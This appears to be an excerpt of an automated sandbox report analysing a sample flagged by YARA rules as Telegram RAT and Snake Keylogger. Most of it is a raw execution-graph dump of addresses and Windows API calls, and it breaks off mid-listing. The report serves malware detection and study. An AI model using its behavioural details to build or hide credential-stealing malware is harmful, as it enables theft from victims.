                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:3.6%
                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                Signature Coverage:9.1%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:67
                                                                                                                execution_graph 93313 1348f50 93327 1346b70 93313->93327 93315 1349011 93330 1348e40 93315->93330 93333 134a060 GetPEB 93327->93333 93329 13471fb 93329->93315 93331 1348e49 Sleep 93330->93331 93332 1348e57 93331->93332 93334 134a08a 93333->93334 93334->93329 93335 509c06 93346 4ad3be 93335->93346 93337 509c1c 93338 509c91 Mailbox 93337->93338 93428 491caa 49 API calls 93337->93428 93355 4a3200 93338->93355 93341 509cc5 93344 50a7ab Mailbox 93341->93344 93430 4dcc5c 86 API calls 4 library calls 93341->93430 93343 509c71 93343->93341 93429 4db171 48 API calls 93343->93429 93347 4ad3ca 93346->93347 93348 4ad3dc 93346->93348 93431 49dcae 50 API calls Mailbox 93347->93431 93350 4ad40b 93348->93350 93351 4ad3e2 93348->93351 93441 49dcae 50 API calls Mailbox 93350->93441 93432 4af4ea 93351->93432 93354 4ad3d4 93354->93337 93464 49bd30 93355->93464 93357 4a3267 93359 4a32f8 93357->93359 93360 50907a 93357->93360 93426 4a3628 93357->93426 93537 4ac36b 86 API calls 93359->93537 93572 4dcc5c 86 API calls 4 library calls 93360->93572 93362 509072 93362->93341 93364 5094df 93364->93426 93607 4dcc5c 86 API calls 4 library calls 93364->93607 93366 4a3313 93366->93364 93384 4a34eb Mailbox ___crtGetEnvironmentStringsW 93366->93384 93366->93426 93469 492b7a 93366->93469 93370 50926d 93591 4dcc5c 86 API calls 4 library calls 93370->93591 93371 50909a 93414 5091fa 93371->93414 93573 49d645 93371->93573 93374 49fe30 335 API calls 93376 509407 93374->93376 93376->93426 93596 49d6e9 93376->93596 93378 509220 93588 491caa 49 API calls 93378->93588 93379 509114 93392 509128 93379->93392 93402 509152 93379->93402 93381 4a33ce 93381->93384 93386 50945e 93381->93386 93387 4a3465 93381->93387 93384->93370 93384->93371 93389 509438 93384->93389 93398 4ac3c3 48 API calls 93384->93398 93410 4af4ea 48 API calls 93384->93410 93412 4a351f 93384->93412 93417 509394 93384->93417 93421 5093c5 93384->93421 93384->93426 93539 49d9a0 53 API calls __cinit 93384->93539 93540 49d8c0 53 API calls 93384->93540 93541 4ac2d6 48 API calls ___crtGetEnvironmentStringsW 93384->93541 93542 49fe30 93384->93542 93592 4ecda2 82 API calls Mailbox 93384->93592 93593 4d80e3 53 API calls 93384->93593 93594 49d764 55 API calls 93384->93594 93595 49dcae 50 API calls Mailbox 93384->93595 93601 4dc942 50 API calls 93386->93601 93394 4af4ea 48 API calls 93387->93394 93600 4dcc5c 86 API calls 4 library calls 93389->93600 93390 50923d 93395 509252 93390->93395 93396 50925e 93390->93396 93583 4dcc5c 86 API calls 4 library calls 93392->93583 93406 4a346c 93394->93406 93589 4dcc5c 86 API calls 4 library calls 93395->93589 93590 4dcc5c 86 API calls 4 library calls 93396->93590 93398->93384 93403 509177 93402->93403 93407 509195 93402->93407 93584 4ef320 335 API calls 93403->93584 93406->93412 93476 49e8d0 93406->93476 93408 50918b 93407->93408 93585 4ef5ee 335 API calls 93407->93585 93408->93426 93586 4ac2d6 48 API calls ___crtGetEnvironmentStringsW 93408->93586 93410->93384 93416 4a3540 93412->93416 93602 496eed 93412->93602 93587 4dcc5c 86 API calls 4 library calls 93414->93587 93420 5094b0 93416->93420 93423 4a3585 93416->93423 93416->93426 93419 4af4ea 48 API calls 93417->93419 93419->93421 93606 49dcae 50 API calls Mailbox 93420->93606 93421->93374 93423->93364 93424 4a3615 93423->93424 93423->93426 93538 49dcae 50 API calls Mailbox 93424->93538 93427 4a3635 Mailbox 93426->93427 93571 4dcc5c 86 API calls 4 library calls 93426->93571 93427->93341 93428->93343 93429->93338 93430->93344 93431->93354 93435 4af4f2 __calloc_impl 93432->93435 93434 4af50c 93434->93354 93435->93434 93436 4af50e std::exception::exception 93435->93436 93442 4b395c 93435->93442 93456 4b6805 RaiseException 93436->93456 93438 4af538 93457 4b673b 47 API calls _free 93438->93457 93440 4af54a 93440->93354 93441->93354 93443 4b39d7 __calloc_impl 93442->93443 93449 4b3968 __calloc_impl 93442->93449 93463 4b7c0e 47 API calls __getptd_noexit 93443->93463 93446 4b399b RtlAllocateHeap 93446->93449 93455 4b39cf 93446->93455 93448 4b39c3 93461 4b7c0e 47 API calls __getptd_noexit 93448->93461 93449->93446 93449->93448 93452 4b39c1 93449->93452 93453 4b3973 93449->93453 93462 4b7c0e 47 API calls __getptd_noexit 93452->93462 93453->93449 93458 4b81c2 47 API calls __NMSG_WRITE 93453->93458 93459 4b821f 47 API calls 7 library calls 93453->93459 93460 4b1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93453->93460 93455->93435 93456->93438 93457->93440 93458->93453 93459->93453 93461->93452 93462->93455 93463->93455 93465 49bd3f 93464->93465 93468 49bd5a 93464->93468 93608 49bdfa 93465->93608 93467 49bd47 CharUpperBuffW 93467->93468 93468->93357 93470 492b8b 93469->93470 93471 50436a 93469->93471 93472 4af4ea 48 API calls 93470->93472 93473 492b92 93472->93473 93474 492bb3 93473->93474 93625 492bce 48 API calls 93473->93625 93474->93381 93477 49e8f6 93476->93477 93536 49e906 Mailbox 93476->93536 93478 49ed52 93477->93478 93477->93536 93720 4ae3cd 335 API calls 93478->93720 93479 4dcc5c 86 API calls 93479->93536 93481 49ebdd 93481->93384 93483 49ed63 93483->93481 93485 49ed70 93483->93485 93484 49e94c PeekMessageW 93484->93536 93722 4ae312 335 API calls Mailbox 93485->93722 93487 50526e Sleep 93487->93536 93488 49ed77 LockWindowUpdate DestroyWindow GetMessageW 93488->93481 93489 49eda9 93488->93489 93492 5059ef TranslateMessage DispatchMessageW GetMessageW 93489->93492 93490 49ebc7 93490->93481 93721 492ff6 16 API calls 93490->93721 93492->93492 93496 505a1f 93492->93496 93494 49ed21 PeekMessageW 93494->93536 93495 491caa 49 API calls 93495->93536 93496->93481 93497 49ebf7 timeGetTime 93497->93536 93499 496eed 48 API calls 93499->93536 93500 49ed3a TranslateMessage DispatchMessageW 93500->93494 93501 4af4ea 48 API calls 93501->93536 93502 505557 WaitForSingleObject 93503 505574 GetExitCodeProcess CloseHandle 93502->93503 93502->93536 93503->93536 93505 50588f Sleep 93531 505429 Mailbox 93505->93531 93506 49edae timeGetTime 93723 491caa 49 API calls 93506->93723 93509 505733 Sleep 93509->93531 93511 492aae 311 API calls 93511->93536 93513 4adc38 timeGetTime 93513->93531 93514 505926 GetExitCodeProcess 93515 505952 CloseHandle 93514->93515 93516 50593c WaitForSingleObject 93514->93516 93515->93531 93516->93515 93516->93536 93517 505445 Sleep 93517->93536 93518 4f8c4b 108 API calls 93518->93531 93519 492c79 107 API calls 93519->93531 93521 505432 Sleep 93521->93517 93522 5059ae Sleep 93522->93536 93527 49fe30 311 API calls 93527->93536 93528 49d6e9 55 API calls 93528->93531 93530 4a3200 311 API calls 93530->93536 93531->93513 93531->93514 93531->93517 93531->93518 93531->93519 93531->93521 93531->93522 93531->93528 93531->93536 93725 49d7f7 93531->93725 93730 4d4cbe 49 API calls Mailbox 93531->93730 93731 491caa 49 API calls 93531->93731 93732 49ce19 93531->93732 93738 492aae 335 API calls 93531->93738 93739 4eccb2 50 API calls 93531->93739 93740 4d7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93531->93740 93741 4d6532 63 API calls 3 library calls 93531->93741 93534 49ce19 48 API calls 93534->93536 93535 49d6e9 55 API calls 93535->93536 93536->93479 93536->93484 93536->93487 93536->93490 93536->93494 93536->93495 93536->93497 93536->93499 93536->93500 93536->93501 93536->93502 93536->93505 93536->93506 93536->93509 93536->93511 93536->93517 93536->93527 93536->93530 93536->93531 93536->93534 93536->93535 93626 49f110 93536->93626 93691 4a45e0 93536->93691 93708 4ae244 93536->93708 93713 4adc5f 93536->93713 93718 49eed0 335 API calls Mailbox 93536->93718 93719 49ef00 86 API calls 93536->93719 93724 4f8d23 48 API calls 93536->93724 93537->93366 93538->93426 93539->93384 93540->93384 93541->93384 93543 49fe50 93542->93543 93567 49fe7e 93542->93567 93544 4af4ea 48 API calls 93543->93544 93544->93567 93545 4a146e 93546 496eed 48 API calls 93545->93546 93569 49ffe1 93546->93569 93547 4c97ed InterlockedDecrement 93547->93567 93548 49d7f7 48 API calls 93548->93567 93551 4a0509 94789 4dcc5c 86 API calls 4 library calls 93551->94789 93552 4af4ea 48 API calls 93552->93567 93554 4a1473 94788 4dcc5c 86 API calls 4 library calls 93554->94788 93555 50a922 93555->93384 93556 50a246 93560 496eed 48 API calls 93556->93560 93559 496eed 48 API calls 93559->93567 93560->93569 93561 50a873 93561->93384 93562 50a30e 93562->93569 94786 4c97ed InterlockedDecrement 93562->94786 93563 4b0f0a 52 API calls __cinit 93563->93567 93565 50a973 94790 4dcc5c 86 API calls 4 library calls 93565->94790 93567->93545 93567->93547 93567->93548 93567->93551 93567->93552 93567->93554 93567->93556 93567->93559 93567->93562 93567->93563 93567->93565 93567->93569 93570 4a15b5 93567->93570 94784 4a1820 335 API calls 2 library calls 93567->94784 94785 4a1d10 59 API calls Mailbox 93567->94785 93568 50a982 93569->93384 94787 4dcc5c 86 API calls 4 library calls 93570->94787 93571->93362 93572->93366 93574 49d654 93573->93574 93582 49d67e 93573->93582 93575 49d65b 93574->93575 93578 49d6c2 93574->93578 93576 49d666 93575->93576 93581 49d6ab 93575->93581 94791 49d9a0 53 API calls __cinit 93576->94791 93578->93581 94793 4adce0 53 API calls 93578->94793 93581->93582 94792 4adce0 53 API calls 93581->94792 93582->93378 93582->93379 93583->93426 93584->93408 93585->93408 93586->93414 93587->93426 93588->93390 93589->93426 93590->93426 93591->93426 93592->93384 93593->93384 93594->93384 93595->93384 93597 49d6f4 93596->93597 93598 49d71b 93597->93598 94794 49d764 55 API calls 93597->94794 93598->93389 93600->93426 93601->93412 93603 496ef8 93602->93603 93604 496f00 93602->93604 94795 49dd47 48 API calls ___crtGetEnvironmentStringsW 93603->94795 93604->93416 93606->93364 93607->93426 93609 49be0d 93608->93609 93613 49be0a ___crtGetEnvironmentStringsW 93608->93613 93610 4af4ea 48 API calls 93609->93610 93611 49be17 93610->93611 93614 4aee75 93611->93614 93613->93467 93616 4af4ea __calloc_impl 93614->93616 93615 4b395c __crtCompareStringA_stat 47 API calls 93615->93616 93616->93615 93617 4af50c 93616->93617 93618 4af50e std::exception::exception 93616->93618 93617->93613 93623 4b6805 RaiseException 93618->93623 93620 4af538 93624 4b673b 47 API calls _free 93620->93624 93622 4af54a 93622->93613 93623->93620 93624->93622 93625->93474 93627 49f130 93626->93627 93628 49f199 93627->93628 93629 49fe30 335 API calls 93627->93629 93630 49f595 93628->93630 93638 49d7f7 48 API calls 93628->93638 93668 49f229 93628->93668 93679 49f3dd 93628->93679 93631 508728 93629->93631 93635 49d7f7 48 API calls 93630->93635 93673 49f431 Mailbox 93630->93673 93631->93628 93759 4dcc5c 86 API calls 4 library calls 93631->93759 93632 5087c8 93762 4dcc5c 86 API calls 4 library calls 93632->93762 93637 5087a3 93635->93637 93636 49f3f2 93672 49f418 93636->93672 93763 4d9af1 48 API calls 93636->93763 93761 4b0f0a 52 API calls __cinit 93637->93761 93640 508772 93638->93640 93639 508b1b 93658 508b2c 93639->93658 93659 508bcf 93639->93659 93760 4b0f0a 52 API calls __cinit 93640->93760 93643 49f770 93650 508a45 93643->93650 93667 49f77a 93643->93667 93645 49d6e9 55 API calls 93645->93673 93646 508c53 93777 4dcc5c 86 API calls 4 library calls 93646->93777 93647 508810 93764 4eeef8 335 API calls 93647->93764 93648 49fe30 335 API calls 93669 49f6aa 93648->93669 93649 4dcc5c 86 API calls 93649->93673 93769 4ac1af 48 API calls 93650->93769 93651 508b7e 93772 4ee40a 335 API calls Mailbox 93651->93772 93653 49fe30 335 API calls 93653->93673 93771 4ef5ee 335 API calls 93658->93771 93774 4dcc5c 86 API calls 4 library calls 93659->93774 93660 508beb 93775 4ebdbd 335 API calls Mailbox 93660->93775 93663 4a1b90 48 API calls 93663->93673 93666 508c00 93690 49f537 Mailbox 93666->93690 93776 4dcc5c 86 API calls 4 library calls 93666->93776 93742 4a1b90 93667->93742 93668->93630 93668->93672 93668->93673 93668->93679 93669->93643 93669->93648 93670 49fce0 93669->93670 93669->93673 93669->93690 93670->93690 93773 4dcc5c 86 API calls 4 library calls 93670->93773 93672->93639 93672->93669 93672->93673 93673->93645 93673->93646 93673->93649 93673->93651 93673->93653 93673->93660 93673->93663 93673->93670 93673->93690 93758 49dd47 48 API calls ___crtGetEnvironmentStringsW 93673->93758 93770 4c97ed InterlockedDecrement 93673->93770 93778 4ac1af 48 API calls 93673->93778 93674 508823 93674->93672 93677 50884b 93674->93677 93765 4eccdc 48 API calls 93677->93765 93679->93632 93679->93636 93679->93673 93680 508857 93682 508865 93680->93682 93683 5088aa 93680->93683 93766 4d9b72 48 API calls 93682->93766 93686 5088a0 Mailbox 93683->93686 93767 4da69d 48 API calls 93683->93767 93684 49fe30 335 API calls 93684->93690 93686->93684 93688 5088e7 93768 49bc74 48 API calls 93688->93768 93690->93536 93692 4a479f 93691->93692 93693 4a4637 93691->93693 93696 49ce19 48 API calls 93692->93696 93694 506e05 93693->93694 93695 4a4643 93693->93695 93841 4ee822 335 API calls Mailbox 93694->93841 93840 4a4300 335 API calls ___crtGetEnvironmentStringsW 93695->93840 93703 4a46e4 Mailbox 93696->93703 93699 4a4739 Mailbox 93699->93536 93700 506e11 93700->93699 93842 4dcc5c 86 API calls 4 library calls 93700->93842 93702 4a4659 93702->93699 93702->93700 93702->93703 93781 4d6524 93703->93781 93784 494252 93703->93784 93790 4e6ff0 93703->93790 93799 4dfa0c 93703->93799 93709 50df42 93708->93709 93710 4ae253 93708->93710 93711 50df77 93709->93711 93712 50df59 TranslateAcceleratorW 93709->93712 93710->93536 93712->93710 93714 4adca3 93713->93714 93716 4adc71 93713->93716 93714->93536 93715 4adc96 IsDialogMessageW 93715->93714 93715->93716 93716->93714 93716->93715 93717 50dd1d GetClassLongW 93716->93717 93717->93715 93717->93716 93718->93536 93719->93536 93720->93490 93721->93483 93722->93488 93723->93536 93724->93536 93726 4af4ea 48 API calls 93725->93726 93727 49d818 93726->93727 93728 4af4ea 48 API calls 93727->93728 93729 49d826 93728->93729 93729->93531 93730->93531 93731->93531 93733 49ce28 __wsetenvp 93732->93733 93734 4aee75 48 API calls 93733->93734 93735 49ce50 ___crtGetEnvironmentStringsW 93734->93735 93736 4af4ea 48 API calls 93735->93736 93737 49ce66 93736->93737 93737->93531 93738->93531 93739->93531 93740->93531 93741->93531 93743 4a1cf6 93742->93743 93745 4a1ba2 93742->93745 93743->93673 93746 4af4ea 48 API calls 93745->93746 93756 4a1bae 93745->93756 93747 5049c4 93746->93747 93748 4af4ea 48 API calls 93747->93748 93757 5049cf 93748->93757 93749 4a1bb9 93750 4a1c5d 93749->93750 93751 4af4ea 48 API calls 93749->93751 93750->93673 93752 4a1c9f 93751->93752 93753 4a1cb2 93752->93753 93779 492925 48 API calls 93752->93779 93753->93673 93755 4af4ea 48 API calls 93755->93757 93756->93749 93780 4ac15c 48 API calls 93756->93780 93757->93755 93757->93756 93758->93673 93759->93628 93760->93668 93761->93673 93762->93690 93763->93647 93764->93674 93765->93680 93766->93686 93767->93688 93768->93686 93769->93673 93770->93673 93771->93673 93772->93670 93773->93690 93774->93690 93775->93666 93776->93690 93777->93690 93778->93673 93779->93753 93780->93749 93843 4d6ca9 GetFileAttributesW 93781->93843 93785 49425c 93784->93785 93789 494263 93784->93789 93847 4b35e4 93785->93847 93787 494283 FreeLibrary 93788 494272 93787->93788 93788->93699 93789->93787 93789->93788 94153 49936c 93790->94153 93792 4e702a 94173 49b470 93792->94173 93794 4e703a 93795 4e705f 93794->93795 93796 49fe30 335 API calls 93794->93796 93798 4e7063 93795->93798 94201 49cdb9 48 API calls 93795->94201 93796->93795 93798->93699 93800 4dfa1c __ftell_nolock 93799->93800 93801 4dfa44 93800->93801 94314 49d286 48 API calls 93800->94314 93803 49936c 81 API calls 93801->93803 93804 4dfa5e 93803->93804 93805 4dfb92 93804->93805 93806 4dfb68 93804->93806 93807 4dfa80 93804->93807 93805->93699 94226 4941a9 93806->94226 93809 49936c 81 API calls 93807->93809 93814 4dfa8c _wcscpy _wcschr 93809->93814 93811 4dfb8e 93811->93805 93813 49936c 81 API calls 93811->93813 93812 4941a9 136 API calls 93812->93811 93815 4dfbc7 93813->93815 93819 4dfab0 _wcscat _wcscpy 93814->93819 93823 4dfade _wcscat 93814->93823 94250 4b1dfc 93815->94250 93817 49936c 81 API calls 93818 4dfafc _wcscpy 93817->93818 94315 4d72cb GetFileAttributesW 93818->94315 93821 49936c 81 API calls 93819->93821 93821->93823 93822 4dfb1c __wsetenvp 93822->93805 93825 49936c 81 API calls 93822->93825 93823->93817 93824 4dfbeb _wcscat _wcscpy 93827 49936c 81 API calls 93824->93827 93826 4dfb48 93825->93826 94316 4d60dd 77 API calls 4 library calls 93826->94316 93830 4dfc82 93827->93830 93829 4dfb5c 93829->93805 94253 4d690b 93830->94253 93832 4dfca2 93833 4d6524 3 API calls 93832->93833 93834 4dfcb1 93833->93834 93835 49936c 81 API calls 93834->93835 93837 4dfce2 93834->93837 93836 4dfccb 93835->93836 94259 4dbfa4 93836->94259 93839 494252 84 API calls 93837->93839 93839->93805 93840->93702 93841->93700 93842->93699 93844 4d6cc4 FindFirstFileW 93843->93844 93846 4d6529 93843->93846 93845 4d6cd9 FindClose 93844->93845 93844->93846 93845->93846 93846->93699 93848 4b35f0 type_info::_Type_info_dtor 93847->93848 93849 4b361c 93848->93849 93850 4b3604 93848->93850 93856 4b3614 type_info::_Type_info_dtor 93849->93856 93860 4b4e1c 93849->93860 93882 4b7c0e 47 API calls __getptd_noexit 93850->93882 93852 4b3609 93883 4b6e10 8 API calls _xtow_s@20 93852->93883 93856->93789 93861 4b4e4e RtlEnterCriticalSection 93860->93861 93862 4b4e2c 93860->93862 93864 4b362e 93861->93864 93862->93861 93863 4b4e34 93862->93863 93885 4b7cf4 93863->93885 93866 4b3578 93864->93866 93867 4b359b 93866->93867 93868 4b3587 93866->93868 93874 4b3597 93867->93874 93930 4b2c84 93867->93930 93970 4b7c0e 47 API calls __getptd_noexit 93868->93970 93871 4b358c 93971 4b6e10 8 API calls _xtow_s@20 93871->93971 93884 4b3653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 93874->93884 93878 4b35b5 93947 4be9d2 93878->93947 93880 4b35bb 93880->93874 93881 4b1c9d _free 47 API calls 93880->93881 93881->93874 93882->93852 93883->93856 93884->93856 93886 4b7d18 RtlEnterCriticalSection 93885->93886 93887 4b7d05 93885->93887 93886->93864 93892 4b7d7c 93887->93892 93889 4b7d0b 93889->93886 93916 4b115b 47 API calls 3 library calls 93889->93916 93893 4b7d88 type_info::_Type_info_dtor 93892->93893 93894 4b7da9 93893->93894 93895 4b7d91 93893->93895 93896 4b7da7 93894->93896 93902 4b7e11 type_info::_Type_info_dtor 93894->93902 93917 4b81c2 47 API calls __NMSG_WRITE 93895->93917 93896->93894 93920 4b69d0 47 API calls __crtCompareStringA_stat 93896->93920 93899 4b7d96 93918 4b821f 47 API calls 7 library calls 93899->93918 93900 4b7dbd 93903 4b7dd3 93900->93903 93904 4b7dc4 93900->93904 93902->93889 93907 4b7cf4 __lock 46 API calls 93903->93907 93921 4b7c0e 47 API calls __getptd_noexit 93904->93921 93905 4b7d9d 93919 4b1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93905->93919 93910 4b7dda 93907->93910 93909 4b7dc9 93909->93902 93911 4b7de9 InitializeCriticalSectionAndSpinCount 93910->93911 93912 4b7dfe 93910->93912 93913 4b7e04 93911->93913 93922 4b1c9d 93912->93922 93928 4b7e1a RtlLeaveCriticalSection _doexit 93913->93928 93917->93899 93918->93905 93920->93900 93921->93909 93923 4b1ccf __dosmaperr 93922->93923 93924 4b1ca6 RtlFreeHeap 93922->93924 93923->93913 93924->93923 93925 4b1cbb 93924->93925 93929 4b7c0e 47 API calls __getptd_noexit 93925->93929 93927 4b1cc1 GetLastError 93927->93923 93928->93902 93929->93927 93931 4b2c97 93930->93931 93935 4b2cbb 93930->93935 93932 4b2933 __fseek_nolock 47 API calls 93931->93932 93931->93935 93933 4b2cb4 93932->93933 93972 4baf61 93933->93972 93936 4beb36 93935->93936 93937 4beb43 93936->93937 93939 4b35af 93936->93939 93938 4b1c9d _free 47 API calls 93937->93938 93937->93939 93938->93939 93940 4b2933 93939->93940 93941 4b293d 93940->93941 93942 4b2952 93940->93942 94109 4b7c0e 47 API calls __getptd_noexit 93941->94109 93942->93878 93944 4b2942 94110 4b6e10 8 API calls _xtow_s@20 93944->94110 93946 4b294d 93946->93878 93948 4be9de type_info::_Type_info_dtor 93947->93948 93949 4be9fe 93948->93949 93950 4be9e6 93948->93950 93951 4bea7b 93949->93951 93957 4bea28 93949->93957 94126 4b7bda 47 API calls __getptd_noexit 93950->94126 94130 4b7bda 47 API calls __getptd_noexit 93951->94130 93953 4be9eb 94127 4b7c0e 47 API calls __getptd_noexit 93953->94127 93956 4bea80 94131 4b7c0e 47 API calls __getptd_noexit 93956->94131 93959 4ba8ed ___lock_fhandle 49 API calls 93957->93959 93961 4bea2e 93959->93961 93960 4bea88 94132 4b6e10 8 API calls _xtow_s@20 93960->94132 93963 4bea4c 93961->93963 93964 4bea41 93961->93964 94128 4b7c0e 47 API calls __getptd_noexit 93963->94128 94111 4bea9c 93964->94111 93965 4be9f3 type_info::_Type_info_dtor 93965->93880 93968 4bea47 94129 4bea73 RtlLeaveCriticalSection __unlock_fhandle 93968->94129 93970->93871 93971->93874 93973 4baf6d type_info::_Type_info_dtor 93972->93973 93974 4baf8d 93973->93974 93975 4baf75 93973->93975 93976 4bb022 93974->93976 93981 4bafbf 93974->93981 94070 4b7bda 47 API calls __getptd_noexit 93975->94070 94075 4b7bda 47 API calls __getptd_noexit 93976->94075 93979 4baf7a 94071 4b7c0e 47 API calls __getptd_noexit 93979->94071 93980 4bb027 94076 4b7c0e 47 API calls __getptd_noexit 93980->94076 93997 4ba8ed 93981->93997 93985 4bb02f 94077 4b6e10 8 API calls _xtow_s@20 93985->94077 93986 4bafc5 93988 4bafeb 93986->93988 93989 4bafd8 93986->93989 94072 4b7c0e 47 API calls __getptd_noexit 93988->94072 94006 4bb043 93989->94006 93991 4baf82 type_info::_Type_info_dtor 93991->93935 93993 4bafe4 94074 4bb01a RtlLeaveCriticalSection __unlock_fhandle 93993->94074 93994 4baff0 94073 4b7bda 47 API calls __getptd_noexit 93994->94073 93998 4ba8f9 type_info::_Type_info_dtor 93997->93998 93999 4ba946 RtlEnterCriticalSection 93998->93999 94000 4b7cf4 __lock 47 API calls 93998->94000 94001 4ba96c type_info::_Type_info_dtor 93999->94001 94002 4ba91d 94000->94002 94001->93986 94003 4ba93a 94002->94003 94004 4ba928 InitializeCriticalSectionAndSpinCount 94002->94004 94078 4ba970 RtlLeaveCriticalSection _doexit 94003->94078 94004->94003 94007 4bb050 __ftell_nolock 94006->94007 94008 4bb082 94007->94008 94009 4bb08d 94007->94009 94010 4bb0ac 94007->94010 94102 4ba70c 94008->94102 94088 4b7bda 47 API calls __getptd_noexit 94009->94088 94013 4bb105 94010->94013 94014 4bb0e9 94010->94014 94018 4bb11c 94013->94018 94094 4bf82f 49 API calls 3 library calls 94013->94094 94091 4b7bda 47 API calls __getptd_noexit 94014->94091 94015 4bb86b 94015->93993 94016 4bb092 94089 4b7c0e 47 API calls __getptd_noexit 94016->94089 94079 4c3bf2 94018->94079 94020 4bb0ee 94092 4b7c0e 47 API calls __getptd_noexit 94020->94092 94022 4bb099 94090 4b6e10 8 API calls _xtow_s@20 94022->94090 94026 4bb12a 94027 4bb44b 94026->94027 94095 4b7a0d 47 API calls 2 library calls 94026->94095 94029 4bb7b8 WriteFile 94027->94029 94030 4bb463 94027->94030 94028 4bb0f5 94093 4b6e10 8 API calls _xtow_s@20 94028->94093 94034 4bb7e1 GetLastError 94029->94034 94042 4bb410 94029->94042 94033 4bb55a 94030->94033 94040 4bb479 94030->94040 94044 4bb565 94033->94044 94046 4bb663 94033->94046 94034->94042 94035 4bb150 GetConsoleMode 94035->94027 94037 4bb189 94035->94037 94036 4bb81b 94036->94008 94100 4b7c0e 47 API calls __getptd_noexit 94036->94100 94037->94027 94038 4bb199 GetConsoleCP 94037->94038 94038->94042 94068 4bb1c2 94038->94068 94039 4bb4e9 WriteFile 94039->94034 94045 4bb526 94039->94045 94040->94036 94040->94039 94042->94008 94042->94036 94043 4bb7f7 94042->94043 94048 4bb7fe 94043->94048 94049 4bb812 94043->94049 94044->94036 94050 4bb5de WriteFile 94044->94050 94045->94040 94045->94042 94056 4bb555 94045->94056 94046->94036 94051 4bb6d8 WideCharToMultiByte 94046->94051 94047 4bb843 94101 4b7bda 47 API calls __getptd_noexit 94047->94101 94097 4b7c0e 47 API calls __getptd_noexit 94048->94097 94099 4b7bed 47 API calls 2 library calls 94049->94099 94050->94034 94055 4bb62d 94050->94055 94051->94034 94062 4bb71f 94051->94062 94055->94042 94055->94044 94055->94056 94056->94042 94057 4bb803 94098 4b7bda 47 API calls __getptd_noexit 94057->94098 94058 4bb727 WriteFile 94060 4bb77a GetLastError 94058->94060 94058->94062 94060->94062 94062->94042 94062->94046 94062->94056 94062->94058 94063 4c5884 WriteConsoleW CreateFileW __chsize_nolock 94066 4bb2f6 94063->94066 94064 4c40f7 59 API calls __chsize_nolock 94064->94068 94065 4bb28f WideCharToMultiByte 94065->94042 94067 4bb2ca WriteFile 94065->94067 94066->94034 94066->94042 94066->94063 94066->94068 94069 4bb321 WriteFile 94066->94069 94067->94034 94067->94066 94068->94042 94068->94064 94068->94065 94068->94066 94096 4b1688 57 API calls __isleadbyte_l 94068->94096 94069->94034 94069->94066 94070->93979 94071->93991 94072->93994 94073->93993 94074->93991 94075->93980 94076->93985 94077->93991 94078->93999 94080 4c3bfd 94079->94080 94081 4c3c0a 94079->94081 94082 4b7c0e _xtow_s@20 47 API calls 94080->94082 94083 4b7c0e _xtow_s@20 47 API calls 94081->94083 94084 4c3c16 94081->94084 94086 4c3c02 94082->94086 94085 4c3c37 94083->94085 94084->94026 94087 4b6e10 _xtow_s@20 8 API calls 94085->94087 94086->94026 94087->94086 94088->94016 94089->94022 94090->94008 94091->94020 94092->94028 94093->94008 94094->94018 94095->94035 94096->94068 94097->94057 94098->94008 94099->94008 94100->94047 94101->94008 94103 4ba716 IsProcessorFeaturePresent 94102->94103 94104 4ba714 94102->94104 94106 4c37b0 94103->94106 94104->94015 94107 4c375f ___raise_securityfailure 5 API calls 94106->94107 94108 4c3893 94107->94108 94108->94015 94109->93944 94110->93946 94133 4baba4 94111->94133 94113 4beb00 94146 4bab1e 48 API calls 2 library calls 94113->94146 94114 4beaaa 94114->94113 94115 4beade 94114->94115 94117 4baba4 __lseeki64_nolock 47 API calls 94114->94117 94115->94113 94118 4baba4 __lseeki64_nolock 47 API calls 94115->94118 94120 4bead5 94117->94120 94121 4beaea CloseHandle 94118->94121 94119 4beb08 94122 4beb2a 94119->94122 94147 4b7bed 47 API calls 2 library calls 94119->94147 94124 4baba4 __lseeki64_nolock 47 API calls 94120->94124 94121->94113 94125 4beaf6 GetLastError 94121->94125 94122->93968 94124->94115 94125->94113 94126->93953 94127->93965 94128->93968 94129->93965 94130->93956 94131->93960 94132->93965 94134 4babaf 94133->94134 94136 4babc4 94133->94136 94148 4b7bda 47 API calls __getptd_noexit 94134->94148 94140 4babe9 94136->94140 94150 4b7bda 47 API calls __getptd_noexit 94136->94150 94137 4babb4 94149 4b7c0e 47 API calls __getptd_noexit 94137->94149 94140->94114 94141 4babf3 94151 4b7c0e 47 API calls __getptd_noexit 94141->94151 94142 4babbc 94142->94114 94144 4babfb 94152 4b6e10 8 API calls _xtow_s@20 94144->94152 94146->94119 94147->94122 94148->94137 94149->94142 94150->94141 94151->94144 94152->94142 94154 499384 94153->94154 94171 499380 94153->94171 94155 504cbd __i64tow 94154->94155 94156 499398 94154->94156 94157 504bbf 94154->94157 94165 4993b0 __itow Mailbox _wcscpy 94154->94165 94202 4b172b 80 API calls 3 library calls 94156->94202 94158 504ca5 94157->94158 94159 504bc8 94157->94159 94203 4b172b 80 API calls 3 library calls 94158->94203 94164 504be7 94159->94164 94159->94165 94162 4af4ea 48 API calls 94163 4993ba 94162->94163 94167 49ce19 48 API calls 94163->94167 94163->94171 94166 4af4ea 48 API calls 94164->94166 94165->94162 94168 504c04 94166->94168 94167->94171 94169 4af4ea 48 API calls 94168->94169 94170 504c2a 94169->94170 94170->94171 94172 49ce19 48 API calls 94170->94172 94171->93792 94172->94171 94204 496b0f 94173->94204 94175 49b69b 94216 49ba85 48 API calls ___crtGetEnvironmentStringsW 94175->94216 94177 49b6b5 Mailbox 94177->93794 94180 50397b 94223 4d26bc 